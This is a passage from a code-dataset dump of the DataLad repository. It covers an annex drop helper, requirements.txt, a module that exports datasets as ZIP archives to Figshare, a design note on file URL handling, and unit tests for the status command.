paths : list\n for which files to drop content\n check : bool\n whether to instruct annex to perform minimum copy availability\n checks\n\n Yields\n ------\n dict\n \"\"\"\n assert not (repo.dot_git / 'annex').is_symlink(), \\\n \"Dropping from a symlinked annex is unsupported to prevent data-loss\"\n cmd = ['drop']\n if force:\n cmd.append('--force')\n if jobs:\n cmd.extend(['--jobs', str(jobs)])\n\n respath_by_status = {}\n try:\n yield from (\n _postproc_annexdrop_result(res, respath_by_status, ds)\n for res in repo._call_annex_records_items_(cmd, files=paths)\n )\n except CommandError as e:\n # pick up the results captured so far and yield them\n # the error will be amongst them\n yield from (\n _postproc_annexdrop_result(res, respath_by_status, ds)\n for res in e.kwargs.get('stdout_json', [])\n )\n # report on things requested that annex was silent about\n for r in results_from_annex_noinfo(\n ds, paths, respath_by_status,\n dir_fail_msg='could not drop some content in %s %s',\n noinfo_dir_msg='nothing to drop from %s',\n noinfo_file_msg=\"no annex'ed content\"):\n r['action'] = 'drop'\n yield r\n\n\ndef _postproc_annexdrop_result(res, respath_by_status, ds, **kwargs):\n res = annexjson2result(\n # annex reports are always about files\n res, ds, type='file', **kwargs)\n success = success_status_map[res['status']]\n respath_by_status[success] = \\\n respath_by_status.get(success, []) + [res['path']]\n if res[\"status\"] == \"error\" and res[\"action\"] == \"drop\":\n msg = res.get(\"message\", None)\n if isinstance(msg, str) and \"Use --force to\" in msg:\n # Avoid confusing datalad-drop callers with git-annex-drop's\n # suggestion to use --force.\n # Just mention reckless itself, do not go into the details\n # of which mode. 
This is likely changing over time and\n # adjusting this replacement will be forgotten.\n res[\"message\"] = msg.replace(\n \"--force\",\n \"--reckless availability\")\n return res\n" }, { "alpha_fraction": 0.7138964533805847, "alphanum_fraction": 0.7138964533805847, "avg_line_length": 32.3636360168457, "blob_id": "32a656392bbf384e35c7c589d400a33c5ffedcb9", "content_id": "ce7031e315742bda954c89b6b81aea1e6ed996f6", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 367, "license_type": "permissive", "max_line_length": 88, "num_lines": 11, "path": "/requirements.txt", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# If you want to develop, use requirements-devel.txt\n\n# Theoretically we don't want -e here but ATM pip would puke if just .[full] is provided\n# TODO -- figure it out and/or complain to pip folks\n# -e .[full]\n\n# this one should work but would copy entire . tree so should be ran on a clean copy\n.[full]\n\n# doesn't install datalad itself\n# file://.#egg=datalad[full]\n" }, { "alpha_fraction": 0.5536975264549255, "alphanum_fraction": 0.5550966262817383, "avg_line_length": 37.78553009033203, "blob_id": "1465b114eb2ff64722675fa4fdba08d11ad32b14", "content_id": "81e24edd8e99e5b93b11a52de75eec1151de082e", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 15010, "license_type": "permissive", "max_line_length": 90, "num_lines": 387, "path": "/datalad/distributed/export_to_figshare.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"export a dataset as a TAR/ZIP archive to figshare\"\"\"\n\n__docformat__ = 'restructuredtext'\n\nfrom datalad.utils import unlink\nfrom datalad.interface.base import Interface\nfrom datalad.interface.base import build_doc\nfrom datalad.interface.results import get_status_dict\n\nimport logging\nlgr = logging.getLogger('datalad.distributed.export_to_figshare')\n\n\nclass FigshareRESTLaison(object):\n \"\"\"A little helper to provide minimal interface to interact with Figshare\n \"\"\"\n API_URL = 'https://api.figshare.com/v2'\n\n def __init__(self):\n self._token = None\n from datalad.ui import ui\n self.ui = ui # we will be chatty here\n\n @property\n def token(self):\n if self._token is None:\n from datalad.downloaders.providers import Providers\n providers = Providers.from_config_files()\n provider = providers.get_provider(self.API_URL)\n credential = provider.credential\n self._token = credential().get('token')\n return self._token\n\n def __call__(self, m, url, data=None, success=None, binary=False,\n headers=None, return_json=True):\n \"\"\"A wrapper around requests calls\n\n to interpolate deposition_id, do basic checks and conversion\n \"\"\"\n import json\n if '://' not in url:\n url_ = self.API_URL + '/' + url\n else:\n url_ = url\n\n headers = headers or {}\n if data is not None and not binary:\n data = json.dumps(data)\n headers[\"Content-Type\"] = \"application/json\"\n headers['Authorization'] = \"token %s\" % self.token\n\n lgr.debug(\n \"Submitting %s request to 
%s with data %s (headers: %s)\",\n m.__name__, url_, data, 'sanitized' # headers\n )\n r = m(url_, data=data, headers=headers)\n status_code = r.status_code\n if (success != \"donotcheck\") and \\\n ((success and status_code not in success)\n or (not success and status_code >= 400)):\n msg = \"Got return code %(status_code)s for %(m)s(%(url_)s.\" \\\n % locals()\n raise RuntimeError(\"Error status %s\" % msg)\n\n if return_json:\n return r.json() if r.content else {}\n else:\n return r.content\n\n def put(self, *args, **kwargs):\n import requests\n return self(requests.put, *args, **kwargs)\n\n def post(self, *args, **kwargs):\n import requests\n return self(requests.post, *args, **kwargs)\n\n def get(self, *args, **kwargs):\n import requests\n return self(requests.get, *args, **kwargs)\n\n def upload_file(self, fname, files_url):\n # In v2 API seems no easy way to \"just upload\". Need to initiate,\n # do uploads\n # and finalize\n # TODO: check if the file with the same name already available, and offer\n # to remove/prune it\n import os\n from datalad.utils import md5sum\n from datalad.ui import ui\n file_rec = {'md5': md5sum(fname),\n 'name': os.path.basename(fname),\n 'size': os.stat(fname).st_size\n }\n # Initiate upload\n j = self.post(files_url, file_rec)\n file_endpoint = j['location']\n file_info = self.get(file_endpoint)\n file_upload_info = self.get(file_info['upload_url'])\n\n pbar = ui.get_progressbar(label=fname, # fill_text=f.name,\n total=file_rec['size'])\n with open(fname, 'rb') as f:\n for part in file_upload_info['parts']:\n udata = dict(file_info, **part)\n if part['status'] == 'PENDING':\n f.seek(part['startOffset'])\n data = f.read(part['endOffset'] - part['startOffset'] + 1)\n url = '{upload_url}/{partNo}'.format(**udata)\n ok = self.put(url, data=data, binary=True, return_json=False)\n assert ok == b'OK'\n pbar.update(part['endOffset'], increment=False)\n pbar.finish()\n\n # complete upload\n jcomplete = self.post(file_endpoint, return_json=False)\n return file_info\n\n def get_article_ids(self):\n articles = self.get('account/articles')\n ids = []\n for item in articles or []:\n self.ui.message(' {id} {url} - {title}'.format(**item))\n ids.append(item['id'])\n return ids\n\n def create_article(self, title):\n data = {\n 'title': title\n }\n # we could prefill more fields interactively if desired\n result = self.post('account/articles', data=data)\n result = self.get(result['location'])\n return result\n\n\ndef _get_default_title(dataset):\n \"\"\"Create default title as dataset directory[#UUID][@version]\n with any of [] missing if not defined\n \"\"\"\n from ..support.path import basename\n title = basename(dataset.path)\n if dataset.id:\n title += \"#{dataset.id}\".format(**locals())\n version = dataset.repo.describe()\n if version:\n title += \"@{version}\".format(**locals())\n # 3 is minimal length. Just in case there is no UUID or version and dir\n # is short\n if len(title) < 3:\n title += \"0\"*(3 - len(title))\n return title\n\n\ndef _enter_title(ui, dataset):\n default = _get_default_title(dataset)\n while True:\n title = ui.question(\n \"Please enter the title (must be at least 3 characters long).\",\n title=\"New article\",\n default=default\n )\n if len(title) < 3:\n ui.error(\"Title must be at least 3 characters long.\")\n else:\n return title\n\n\n@build_doc\nclass ExportToFigshare(Interface):\n \"\"\"Export the content of a dataset as a ZIP archive to figshare\n\n Very quick and dirty approach. 
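    A typical invocation is a single call (with ``ds`` being any dataset
    instance, and the article ID just a placeholder)::

        ds.export_to_figshare(article_id=123456)
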
Ideally figshare should be supported as\n a proper git annex special remote. Unfortunately, figshare does not support\n having directories, and can store only a flat list of files. That makes\n it impossible for any sensible publishing of complete datasets.\n\n The only workaround is to publish dataset as a zip-ball, where the entire\n content is wrapped into a .zip archive for which figshare would provide a\n navigator.\n \"\"\"\n\n from datalad.support.param import Parameter\n from datalad.distribution.dataset import datasetmethod\n from datalad.interface.base import eval_results\n from datalad.distribution.dataset import EnsureDataset\n from datalad.support.constraints import (\n EnsureChoice,\n EnsureInt,\n EnsureNone,\n EnsureStr,\n )\n\n _params_ = dict(\n dataset=Parameter(\n args=(\"-d\", \"--dataset\"),\n doc=\"\"\"\"specify the dataset to export. If no dataset is given, an\n attempt is made to identify the dataset based on the current\n working directory.\"\"\",\n constraints=EnsureDataset() | EnsureNone()),\n filename=Parameter(\n args=(\"filename\",),\n metavar=\"PATH\",\n nargs='?',\n doc=\"\"\"File name of the generated ZIP archive. If no file name is\n given the archive will be generated in the top directory\n of the dataset and will be named: datalad_<dataset_uuid>.zip.\"\"\",\n constraints=EnsureStr() | EnsureNone()),\n no_annex=Parameter(\n args=(\"--no-annex\",),\n action=\"store_true\",\n doc=\"\"\"By default the generated .zip file would be added to annex,\n and all files would get registered in git-annex to be available\n from such a tarball. Also upon upload we will register for that\n archive to be a possible source for it in annex. Setting this flag\n disables this behavior.\"\"\"),\n missing_content=Parameter(\n args=(\"--missing-content\",),\n doc=\"\"\"By default, any discovered file with missing content will\n result in an error and the plugin is aborted. Setting this to\n 'continue' will issue warnings instead of failing on error. The\n value 'ignore' will only inform about problem at the 'debug' log\n level. 
The latter two can be helpful when generating a TAR archive\n from a dataset where some file content is not available\n locally.\"\"\",\n constraints=EnsureChoice(\"error\", \"continue\", \"ignore\")),\n # article_id=Parameter(\n # args=(\"--project-id\",),\n # metavar=\"ID\",\n # doc=\"\"\"If given, article (if article_id is not provided) will be\n # created in that project.\"\"\",\n # constraints=EnsureInt() | EnsureNone()),\n article_id=Parameter(\n args=(\"--article-id\",),\n metavar=\"ID\",\n doc=\"\"\"Which article to publish to.\"\"\",\n constraints=EnsureInt() | EnsureNone()),\n )\n\n @staticmethod\n @datasetmethod(name='export_to_figshare')\n @eval_results\n # TODO*: yet another former plugin with dataset first -- do we need that???\n def __call__(filename=None,\n *,\n dataset=None,\n missing_content='error', no_annex=False,\n # TODO: support working with projects and articles within them\n # project_id=None,\n article_id=None):\n import logging\n lgr = logging.getLogger('datalad.plugin.export_to_figshare')\n\n from datalad.ui import ui\n from datalad.api import add_archive_content\n from datalad.api import export_archive\n from datalad.distribution.dataset import require_dataset\n from datalad.support.annexrepo import AnnexRepo\n\n dataset = require_dataset(dataset, check_installed=True,\n purpose='export to figshare')\n\n if not isinstance(dataset.repo, AnnexRepo):\n raise ValueError(\n \"%s is not an annex repo, so annexification could be done\"\n % dataset\n )\n\n if dataset.repo.dirty:\n yield get_status_dict(\n 'export_to_figshare',\n ds=dataset,\n status='impossible',\n message=(\n 'clean dataset required to export; '\n 'use `datalad status` to inspect unsaved changes'))\n return\n if filename is None:\n filename = dataset.path\n lgr.info(\n \"Exporting current tree as an archive under %s since figshare \"\n \"does not support directories\",\n filename\n )\n archive_out = next(\n export_archive(\n dataset=dataset,\n filename=filename,\n archivetype='zip',\n missing_content=missing_content,\n return_type=\"generator\"\n )\n )\n assert archive_out['status'] == 'ok'\n fname = str(archive_out['path'])\n\n lgr.info(\"Uploading %s to figshare\", fname)\n figshare = FigshareRESTLaison()\n\n if not article_id:\n # TODO: ask if it should be an article within a project\n if ui.is_interactive:\n # or should we just upload to a new article?\n if ui.yesno(\n \"Would you like to create a new article to upload to? \"\n \"If not - we will list existing articles\",\n title=\"Article\"\n ):\n article = figshare.create_article(\n title=_enter_title(ui, dataset)\n )\n lgr.info(\n \"Created a new (private) article %(id)s at %(url_private_html)s. 
\"\n \"Please visit it, enter additional meta-data and make public\",\n article\n )\n article_id = article['id']\n else:\n article_id = int(ui.question(\n \"Which of the articles should we upload to.\",\n choices=list(map(str, figshare.get_article_ids()))\n ))\n if not article_id:\n raise ValueError(\"We need an article to upload to.\")\n\n file_info = figshare.upload_file(\n fname,\n files_url='account/articles/%s/files' % article_id\n )\n\n if no_annex:\n lgr.info(\"Removing generated tarball\")\n unlink(fname)\n else:\n # I will leave all the complaining etc to the dataset add if path\n # is outside etc\n lgr.info(\"'Registering' %s within annex\", fname)\n repo = dataset.repo\n repo.add(fname, git=False)\n key = repo.get_file_annexinfo(fname)['key']\n lgr.info(\"Adding URL %(download_url)s for it\", file_info)\n repo.call_annex([\n \"registerurl\", '-c', 'annex.alwayscommit=false',\n key, file_info['download_url']])\n\n lgr.info(\"Registering links back for the content of the archive\")\n add_archive_content(\n fname,\n dataset=dataset,\n delete_after=True, # just remove extracted into a temp dir\n allow_dirty=True, # since we have a tarball\n commit=False # we do not want to commit anything we have done here\n )\n\n lgr.info(\"Removing generated and now registered in annex archive\")\n repo.drop(key, key=True, options=['--force'])\n repo.remove(fname, force=True) # remove the tarball\n\n # if annex in {'delete'}:\n # dataset.repo.remove(fname)\n # else:\n # # kinda makes little sense I guess.\n # # Made more sense if export_archive could export an arbitrary treeish\n # # so we could create a branch where to dump and export to figshare\n # # (kinda closer to my idea)\n # dataset.save(fname, message=\"Added the entire dataset into a zip file\")\n\n # TODO: add to downloader knowledge about figshare token so it could download-url\n # those zipballs before they go public\n yield dict(\n status='ok',\n # TODO: add article url (which needs to be queried if only ID is known\n message=\"Published archive {}\".format(\n file_info['download_url']),\n file_info=file_info,\n path=dataset,\n action='export_to_figshare',\n logger=lgr\n )\n" }, { "alpha_fraction": 0.7640687823295593, "alphanum_fraction": 0.7659524083137512, "avg_line_length": 48.38372039794922, "blob_id": "968a3f3dcafbfea0efb107ec29021ef40fa412f3", "content_id": "16dbdb4808c9318b2f1f4099dfbfaac0e8379b5f", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 4247, "license_type": "permissive", "max_line_length": 110, "num_lines": 86, "path": "/docs/source/design/file_url_handling.rst", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": ".. -*- mode: rst -*-\n.. vi: set ft=rst sts=4 ts=4 sw=4 et tw=79:\n\n.. _chap_design_file_url_handling:\n\n*****************\nFile URL handling\n*****************\n\n.. topic:: Specification scope and status\n\n This specification describes the current implementation.\n\nDataLad datasets can record URLs for file content access as metadata. This is a\nfeature provided by git-annex and is available for any annexed file. DataLad\nimproves upon the git-annex functionality in two ways:\n\n1. Support for a variety of (additional) protocols and authentication methods.\n\n2. 
Support for special URLs pointing to individual files located in registered\n (annexed) archives, such as tarballs and ZIP files.\n\nThese additional features are available to all functionality that is processing\nURLs, such as ``get``, ``addurls``, or ``download-url``.\n\n\nExtensible protocol and authentication support\n==============================================\n\nDataLad ships with a dedicated implementation of an external `git-annex special\nremote`_ named ``git-annex-remote-datalad``. This is a somewhat atypical special\nremote, because it cannot receive files and store them, but only supports\nread operations.\n\nSpecifically, it uses the ``CLAIMURL`` feature of the `external special remote\nprotocol`_ to take over processing of URLs with supported protocols in all\ndatasets that have this special remote configured and enabled.\n\nThis special remote is automatically configured and enabled in DataLad dataset\nas a ``datalad`` remote, by commands that utilize its features, such as\n``download-url``. Once enabled, DataLad (but also git-annex) is able to act on\nadditional protocols, such as ``s3://``, and the respective URLs can be given\ndirectly to commands like ``git annex addurl``, or ``datalad download-url``.\n\nBeyond additional protocol support, the ``datalad`` special remote also\ninterfaces with DataLad's :ref:`chap_design_credentials`. It can identify a\nparticular credential required for a given URL (based on something called a\n\"provider\" configuration), ask for the credential or retrieve it from a\ncredential store, and supply it to the respective service in an appropriate\nform. Importantly, this feature neither requires the necessary credential or\nprovider configuration to be encoded in a URL (where it would become part of\nthe git-annex metadata), nor to be committed to a dataset. Hence all\ninformation that may depend on which entity is performing a URL request\nand in what environment is completely separated from the location information\non a particular file content. This minimizes the required dataset maintenance\neffort (when credentials change), and offers a clean separation of identity\nand availability tracking vs. authentication management.\n\n\nIndexing and access of archive content\n======================================\n\nAnother `git-annex special remote`_, named\n``git-annex-remote-datalad-archives``, is used to enable file content retrieval\nfrom annexed archive files, such as tarballs and ZIP files. Its implementation\nconcept is closely related to the ``git-annex-remote-datalad``, described\nabove. Its main difference is that it claims responsibility for a particular\ntype of \"URL\" (starting with ``dl+archive:``). These URLs encode the identity\nof an archive file, in terms of its git-annex key name, and a relative path\ninside this archive pointing to a particular file.\n\nLike ``git-annex-remote-datalad``, only read operations are supported. When\na request to a ``dl+archive:`` \"URL\" is made, the special remote identifies\nthe archive file, if necessary obtains it at the precise version needed, and\nextracts the respected file content from the archive at the correct location.\n\nThis special remote is automatically configured and enabled as\n``datalad-archives`` by the ``add-archive-content`` command. This command\nindexes annexed archives, extracts, and registers their content to a\ndataset. 
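A rough sketch of how the two mechanisms combine via the Python API (the
dataset location, URL, and archive name below are purely illustrative)::

    from datalad.api import Dataset, add_archive_content, download_url

    ds = Dataset('/tmp/example-ds')
    # retrieval is claimed by the 'datalad' special remote
    # (protocol and credential handling)
    download_url('s3://some-bucket/archive.tar.gz', dataset=ds)
    # index the archive members; their availability is recorded via
    # 'dl+archive:' annotations in the git-annex metadata
    add_archive_content('archive.tar.gz', dataset=ds)
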
File content availability information is recorded in terms of the\n``dl+archive:`` \"URLs\", which are put into the git-annex metadata on a file's\ncontent.\n\n\n.. _git-annex special remote: https://git-annex.branchable.com/special_remotes/\n.. _external special remote protocol: https://git-annex.branchable.com/design/external_special_remote_protocol\n" }, { "alpha_fraction": 0.5828939080238342, "alphanum_fraction": 0.5944206118583679, "avg_line_length": 35.65168380737305, "blob_id": "408be97631ed93b166ddc6fb0b2168479db8ebef", "content_id": "cd10d2193aabaf518d1ec3557f7c9e16e0697056", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 16310, "license_type": "permissive", "max_line_length": 85, "num_lines": 445, "path": "/datalad/core/local/tests/test_status.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test status command\"\"\"\n\nimport os.path as op\n\nimport datalad.utils as ut\nfrom datalad.api import status\nfrom datalad.core.local.status import get_paths_by_ds\nfrom datalad.distribution.dataset import Dataset\nfrom datalad.support.annexrepo import AnnexRepo\nfrom datalad.support.exceptions import (\n CommandError,\n IncompleteResultsError,\n NoDatasetFound,\n)\nfrom datalad.tests.utils_pytest import (\n OBSCURE_FILENAME,\n SkipTest,\n assert_dict_equal,\n assert_in,\n assert_in_results,\n assert_not_in_results,\n assert_raises,\n assert_repo_status,\n assert_result_count,\n assert_status,\n eq_,\n get_deeply_nested_structure,\n has_symlink_capability,\n with_tempfile,\n)\nfrom datalad.utils import (\n chpwd,\n on_windows,\n)\n\n\n@with_tempfile(mkdir=True)\ndef test_runnin_on_empty(path=None):\n # empty repo\n repo = AnnexRepo(path, create=True)\n # just wrap with a dataset\n ds = Dataset(path)\n # and run status ... 
should be good and do nothing\n eq_([], ds.status(result_renderer='disabled'))\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile()\n@with_tempfile(mkdir=True)\ndef test_status_basics(path=None, linkpath=None, otherdir=None):\n if has_symlink_capability():\n # make it more complicated by default\n ut.Path(linkpath).symlink_to(path, target_is_directory=True)\n path = linkpath\n\n with chpwd(path):\n assert_raises(NoDatasetFound, status)\n ds = Dataset(path).create()\n # outcome identical between ds= and auto-discovery\n with chpwd(path):\n assert_raises(IncompleteResultsError, status, path=otherdir)\n stat = status(result_renderer='disabled')\n eq_(stat, ds.status(result_renderer='disabled'))\n assert_status('ok', stat)\n # we have a bunch of reports (be vague to be robust to future changes\n assert len(stat) > 2\n # check the composition\n for s in stat:\n eq_(s['status'], 'ok')\n eq_(s['action'], 'status')\n eq_(s['state'], 'clean')\n eq_(s['type'], 'file')\n assert_in('gitshasum', s)\n assert_in('bytesize', s)\n eq_(s['refds'], ds.path)\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_status_nods(path=None, otherpath=None):\n ds = Dataset(path).create()\n assert_result_count(\n ds.status(path=otherpath, on_failure='ignore', result_renderer='disabled'),\n 1,\n status='error',\n message=('path not underneath the reference dataset %s', ds.path))\n otherds = Dataset(otherpath).create()\n assert_result_count(\n ds.status(path=otherpath, on_failure='ignore', result_renderer='disabled'),\n 1,\n path=otherds.path,\n status='error',\n message=('path not underneath the reference dataset %s', ds.path))\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile()\ndef test_status(_path=None, linkpath=None):\n # do the setup on the real path, not the symlink, to have its\n # bugs not affect this test of status()\n ds = get_deeply_nested_structure(str(_path))\n if has_symlink_capability():\n # make it more complicated by default\n ut.Path(linkpath).symlink_to(_path, target_is_directory=True)\n path = linkpath\n else:\n path = _path\n\n ds = Dataset(path)\n if has_symlink_capability():\n assert ds.pathobj != ds.repo.pathobj\n\n # spotcheck that annex status reporting and availability evaluation\n # works\n assert_result_count(\n ds.status(annex='all', result_renderer='disabled'),\n 1,\n path=str(ds.pathobj / 'subdir' / 'annexed_file.txt'),\n key='MD5E-s5--275876e34cf609db118f3d84b799a790.txt',\n has_content=True,\n objloc=str(ds.repo.pathobj / '.git' / 'annex' / 'objects' /\n # hashdir is different on windows\n ('f33' if ds.repo.is_managed_branch() else '7p') /\n ('94b' if ds.repo.is_managed_branch() else 'gp') /\n 'MD5E-s5--275876e34cf609db118f3d84b799a790.txt' /\n 'MD5E-s5--275876e34cf609db118f3d84b799a790.txt'))\n\n plain_recursive = ds.status(recursive=True, result_renderer='disabled')\n # check integrity of individual reports\n for res in plain_recursive:\n # anything that is an \"intended\" symlink should be reported\n # as such\n if 'link2' in str(res['path']):\n assert res['type'] == 'symlink', res\n # every item must report its parent dataset\n assert_in('parentds', res)\n\n # bunch of smoke tests\n # query of '.' 
is same as no path\n eq_(plain_recursive, ds.status(path='.', recursive=True,\n result_renderer='disabled'))\n # duplicate paths do not change things\n eq_(plain_recursive, ds.status(path=['.', '.'], recursive=True,\n result_renderer='disabled'))\n # neither do nested paths\n eq_(plain_recursive,\n ds.status(path=['.', 'subds_modified'], recursive=True,\n result_renderer='disabled'))\n # when invoked in a subdir of a dataset it still reports on the full thing\n # just like `git status`, as long as there are no paths specified\n with chpwd(op.join(path, 'directory_untracked')):\n plain_recursive = status(recursive=True, result_renderer='disabled')\n # should be able to take absolute paths and yield the same\n # output\n eq_(plain_recursive, ds.status(path=ds.path, recursive=True,\n result_renderer='disabled'))\n\n # query for a deeply nested path from the top, should just work with a\n # variety of approaches\n rpath = op.join('subds_modified', 'subds_lvl1_modified',\n OBSCURE_FILENAME + u'_directory_untracked')\n apathobj = ds.pathobj / rpath\n apath = str(apathobj)\n # ds.repo.pathobj will have the symlink resolved\n arealpath = ds.repo.pathobj / rpath\n # TODO include explicit relative path in test\n for p in (rpath, apath, arealpath, None):\n if p is None:\n # change into the realpath of the dataset and\n # query with an explicit path\n with chpwd(ds.repo.path):\n res = ds.status(path=op.join('.', rpath), result_renderer='disabled')\n else:\n res = ds.status(path=p, result_renderer='disabled')\n assert_result_count(\n res,\n 1,\n state='untracked',\n type='directory',\n refds=ds.path,\n # path always comes out a full path inside the queried dataset\n path=apath,\n )\n\n assert_result_count(\n ds.status(\n recursive=True, result_renderer='disabled'),\n 1,\n path=apath)\n # limiting recursion will exclude this particular path\n assert_result_count(\n ds.status(\n recursive=True,\n recursion_limit=1, result_renderer='disabled'),\n 0,\n path=apath)\n # negative limit is unlimited limit\n eq_(\n ds.status(recursive=True, recursion_limit=-1, result_renderer='disabled'),\n ds.status(recursive=True, result_renderer='disabled')\n )\n\n # check integrity of individual reports with a focus on how symlinks\n # are reported in annex-mode\n # this is different from plain git-mode, which reports types as-is\n # from the git record\n for res in ds.status(recursive=True, annex='basic',\n result_renderer='disabled'):\n # anything that is an \"intended\" symlink should be reported\n # as such. 
In contrast, anything that is a symlink for mere\n # technical reasons (annex using it for something in some mode)\n # should be reported as the thing it is representing (i.e.\n # a file)\n if 'link2' in str(res['path']):\n assert res['type'] == 'symlink', res\n else:\n assert res['type'] != 'symlink', res\n\n@with_tempfile(mkdir=True)\ndef test_untracked_annex_query(path=None):\n # test for #7032\n ds = Dataset(path).create()\n (ds.pathobj / 'untracked_file.txt').write_text(u'dummy')\n res = ds.status(annex='basic', path='untracked_file.txt')\n assert_not_in_results(\n res,\n error_message='File unknown to git',\n )\n\n\n# https://github.com/datalad/datalad-revolution/issues/64\n# breaks when the tempdir is a symlink\n@with_tempfile(mkdir=True)\ndef test_subds_status(path=None):\n ds = Dataset(path).create()\n subds = ds.create('subds')\n assert_repo_status(ds.path)\n subds.create('someotherds')\n assert_repo_status(subds.path)\n assert_repo_status(ds.path, modified=['subds'])\n assert_result_count(\n ds.status(path='subds', result_renderer='disabled'),\n 1,\n # must be modified, not added (ds was clean after it was added)\n state='modified',\n type='dataset',\n path=subds.path,\n refds=ds.path)\n\n # path=\".\" gets treated as \"this dataset's content\" without requiring a\n # trailing \"/\"...\n assert_result_count(\n subds.status(path=\".\", result_renderer='disabled'),\n 1,\n type=\"dataset\",\n path=op.join(subds.path, \"someotherds\"),\n refds=subds.path)\n\n # ... and so does path=<path/to/ds>.\n assert_result_count(\n subds.status(path=subds.path, result_renderer='disabled'),\n 1,\n type=\"dataset\",\n path=op.join(subds.path, \"someotherds\"),\n refds=subds.path)\n\n assert_result_count(\n subds.status(path=op.join(subds.path, op.pardir, \"subds\"),\n result_renderer='disabled'),\n 1,\n type=\"dataset\",\n path=op.join(subds.path, \"someotherds\"),\n refds=subds.path)\n\n assert_result_count(\n subds.status(path=op.join(subds.path, op.curdir),\n result_renderer='disabled'),\n 1,\n type=\"dataset\",\n path=op.join(subds.path, \"someotherds\"),\n refds=subds.path)\n\n\n@with_tempfile\ndef test_status_symlinked_dir_within_repo(path=None):\n if not has_symlink_capability():\n raise SkipTest(\"Can't create symlinks\")\n # <path>\n # |-- bar -> <path>/foo\n # `-- foo\n # `-- f\n ds = Dataset(path).create()\n foo = ds.pathobj / \"foo\"\n foo.mkdir()\n (foo / \"f\").write_text(\"content\")\n (ds.pathobj / \"bar\").symlink_to(foo, target_is_directory=True)\n ds.save()\n bar_f = ds.pathobj / \"bar\" / \"f\"\n\n def call():\n return ds.status(path=[bar_f], annex=\"availability\",\n on_failure=\"ignore\", result_renderer='disabled')\n\n if ds.repo.git_annex_version < \"8.20200522\" \\\n or (on_windows and ds.repo.git_annex_version < \"10.20220525\"):\n # version for windows is an approx guess, but stopped happening\n # somewhere around 10.20220505-g3b83224e5 may be.\n # see https://github.com/datalad/datalad/issues/6849\n assert_result_count(call(), 0)\n elif ds.repo.git_annex_version < '10.20220222':\n # As of 2a8fdfc7d (Display a warning message when asked to operate on a\n # file inside a symlinked directory, 2020-05-11), git-annex will error.\n with assert_raises(CommandError):\n call()\n elif '10.20220222' <= ds.repo.git_annex_version < '10.20220322':\n # No error on annex' side since 10.20220222;\n # However, we'd now get something like this:\n # > git annex find bar/f\n # error: pathspec 'bar/f' did not match any file(s) known to git\n # Did you forget to 'git add'?\n #\n # But exists 
zero until 10.20220322!\n assert_result_count(call(), 0)\n else:\n res = call()\n assert_result_count(res, 1, status='error', state='unknown',\n path=str(bar_f))\n\n\n@with_tempfile\n@with_tempfile\ndef test_get_paths_by_ds(path=None, otherdspath=None):\n otherds = Dataset(otherdspath).create()\n ds = get_deeply_nested_structure(path)\n\n # for testing below, a shortcut\n subds_modified = Dataset(ds.pathobj / 'subds_modified')\n\n # check docstrong of get_deeply_nested_structure() to understand\n # what is being tested here\n testcases = (\n # (\n # (<dataset_arg>, <path arg>),\n # {<path by ds dict>}\n # [<error list>]\n # ),\n\n # find main dataset, pass-through arbitrary arguments, if no paths\n # go in, also no paths come out\n ((path, None), {ds.pathobj: None}, []),\n # a simple path in the rootds, stays just that, not traversal\n # into files underneaths\n ((ds, ['subdir']), {ds.pathobj: [ds.pathobj / 'subdir']}, []),\n # same for files, any number,\n # one record per dataset with multiple files\n ((ds, [op.join('subdir', 'git_file.txt'), 'directory_untracked']),\n {ds.pathobj: [ds.pathobj / 'directory_untracked',\n ds.pathobj / 'subdir' / 'git_file.txt']},\n []),\n # same for a subdataset root -- still reported as part of\n # the superdataset!\n ((ds, ['subds_modified']),\n {ds.pathobj: [subds_modified.pathobj]},\n []),\n # but not with a trailing slash, then it is the subdataset root\n # itself that becomes the record!!!\n ((ds, ['subds_modified' + op.sep]),\n {subds_modified.pathobj: [subds_modified.pathobj]},\n []),\n # however, regardless of the path syntax, each behavior can be forced\n ((ds, ['subds_modified'], 'sub'),\n {subds_modified.pathobj: [subds_modified.pathobj]},\n []),\n ((ds, ['subds_modified' + op.sep], 'super'),\n {ds.pathobj: [subds_modified.pathobj]},\n []),\n # subdataset content is sorted into a subdataset record\n ((ds, [op.join('subds_modified', 'subdir')]),\n {subds_modified.pathobj: [ds.pathobj / 'subds_modified' / 'subdir']},\n []),\n # content from different datasets ends up in different records\n ((ds, [op.join('subdir', 'git_file.txt'),\n op.join('subds_modified', 'subdir'),\n op.join('subds_modified', 'subds_lvl1_modified')]),\n {ds.pathobj: [ds.pathobj / 'subdir' / 'git_file.txt'],\n subds_modified.pathobj: [\n subds_modified.pathobj / 'subdir',\n subds_modified.pathobj / 'subds_lvl1_modified']},\n []),\n # paths not matching existing content are no problem\n ((ds, ['doesnotexist',\n op.join('subdir', 'nothere'),\n op.join('subds_modified', 'subdir', 'gone')]),\n {ds.pathobj: [ds.pathobj / 'doesnotexist',\n ds.pathobj / 'subdir' / 'nothere'],\n subds_modified.pathobj: [\n 